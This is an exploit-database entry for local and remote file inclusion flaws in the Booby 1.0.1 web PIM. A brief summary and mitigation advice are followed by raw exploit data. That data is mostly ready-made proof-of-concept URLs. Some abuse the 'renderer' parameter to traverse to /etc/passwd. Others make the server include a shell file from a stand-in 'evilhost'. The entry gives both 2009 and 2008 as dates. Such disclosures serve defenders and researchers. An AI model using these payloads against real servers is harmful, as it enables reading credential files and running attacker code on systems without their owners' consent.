Multiple Remote Vulnerabilities in Booby 1.0.1

vendor:

Booby

by:

mailbox1333@gmail.com

8.8

CVSS

HIGH

Local File Include / Remote File Include

CWE

Product Name: Booby

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:booby:booby:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Multiple Remote Vulnerabilities in Booby 1.0.1

Booby 1.0.1 is vulnerable to Local File Include (LFI) and Remote File Include (RFI) attacks. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The vulnerable parameter is ‘renderer’ in the ‘template.tpl.php’ file. An attacker can use this vulnerability to read sensitive files from the server or execute malicious code on the server.

Mitigation:

The application should filter user input and validate the input before using it in the application. The application should also use a whitelist of allowed characters and reject any input that contains characters not in the whitelist.

Source

Exploit-DB raw data:

#software name: Booby
#version: 1.0.1
#description: A Webbased Personal Information Manager (PIM) with support for bookmarks, calendar, contacts, notes, news and tasks.
#download: http://sourceforge.net/project/showfiles.php?group_id=87672&package_id=91447&release_id=326826
#bug: Multiple Remote Vulnerabilities
#contact: mailbox1333@gmail.com

Local File Include / Remote File Include in: template.tpl.php

Proof Of Concept LFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd

Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt



regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo /

# milw0rm.com [2008-06-02]